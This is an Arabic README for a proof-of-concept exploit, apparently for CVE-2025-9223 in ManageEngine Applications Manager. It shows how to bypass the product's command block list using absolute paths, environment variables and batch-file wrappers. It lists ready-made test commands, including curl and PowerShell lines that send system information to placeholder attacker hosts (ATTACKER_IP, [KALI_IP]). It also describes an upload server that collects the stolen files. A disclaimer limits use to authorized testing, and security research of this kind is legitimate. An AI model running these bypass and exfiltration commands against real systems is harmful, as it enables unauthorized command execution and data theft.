
إثبات المفهوم لـ CVE-2025-9223
يحتوي هذا المستودع على إثبات المفهوم (PoC) الذي يوضح ثغرة تنفيذ أوامر في وظيفة "Execute Program Action" في ManageEngine Applications Manager.
يستخدم Applications Manager قائمة سوداء (BlackListCommands) لحظر الأوامر الخطيرة، لكن التحقق به عيوب حرجة:
| الطريقة | المثال |
|---|---|
| المسار المطلق | C:\Windows\System32\netstat.exe |
| متغيرات البيئة | %SystemRoot%\System32\netstat.exe |
| سكريبت غلاف | echo netstat > a.bat && a.bat |
C:\Windows\System32\netstat.exe > out.txt && C:\Windows\System32\curl.exe -X POST -F "[email protected]" http://[KALI_IP]:8000/upload
السكريبت upload_server.py يوفر خادم HTTP بسيط لاستقبال الملفات المستخرجة.
python3 upload_server.py
python3 upload_server.py --host 0.0.0.0 --port 8000 --dir ./uploads
--host: عنوان الربط (الافتراضي: 0.0.0.0)--port: منفذ HTTP (الافتراضي: 8000)--dir: مجلد الإخراج (الافتراضي: المجلد الحالي)✅ حماية ضد اجتياز المسار (path traversal)
✅ أسماء ملفات فريدة مع طابع زمني
✅ تسجيل الطلبات مع IP و User-Agent
✅ التحقق من نوع المحتوى
أنشئ ملف test_commands.txt بأمثلة الالتفاف:
# Bypass with absolute path
C:\Windows\System32\whoami.exe
C:\Windows\System32\netstat.exe -an
# Bypass with environment variables
%SystemRoot%\System32\ipconfig.exe
%SystemRoot%\System32\systeminfo.exe
# Bypass with script wrapper
echo ipconfig > test.bat && test.bat
echo whoami > test.bat && call test.bat
# Data exfiltration examples
C:\Windows\System32\ipconfig.exe > network.txt && C:\Windows\System32\curl.exe -X POST -F "[email protected]" http://ATTACKER_IP:8000/upload
C:\Windows\System32\systeminfo.exe > system.txt && C:\Windows\System32\powershell.exe -c "Invoke-WebRequest -Uri http://ATTACKER_IP:8000/upload -Method POST -InFile system.txt"
هام: هذه الأداة مقدمة لأغراض تعليمية واختبارات مصرح بها فقط.
❌ لا تستخدم على أنظمة لا تملكها أو ليس لديك إذن صريح لاختبارها
❌ لا تستخدم لأي نشاط غير قانوني
✅ نعم استخدم فقط في بيئات خاضعة للرقابة لأبحاث أمنية
✅ نعم احصل على التصريح المناسب قبل إجراء الاختبارات
الكاتب غير مسؤول عن أي استخدام خاطئ لهذه الأداة. يتحمل المستخدمون كامل المسؤولية والمخاطرة.
هذا المشروع لأغراض البحث والتعليم فقط. جميع الحقوق محفوظة.
Johan Aybar - للأغراض التعليمية
⚠️ تذكير: يجب استخدام هذا الإثبات (PoC) فقط في بيئات اختبار مصرح بها. الاستخدام غير المصرح به قد يكون غير قانوني وممنوع بشدة.
| الطريقة |
|---|
| نقطة النهاية |
|---|
| الوصف |
|---|
| GET | / | يسرد الملفات المرفوعة مؤخراً |
| POST | /upload | رفع الملفات (multipart/form-data) |
| PUT | /upload/[filename] | تحميل مباشر للملفات |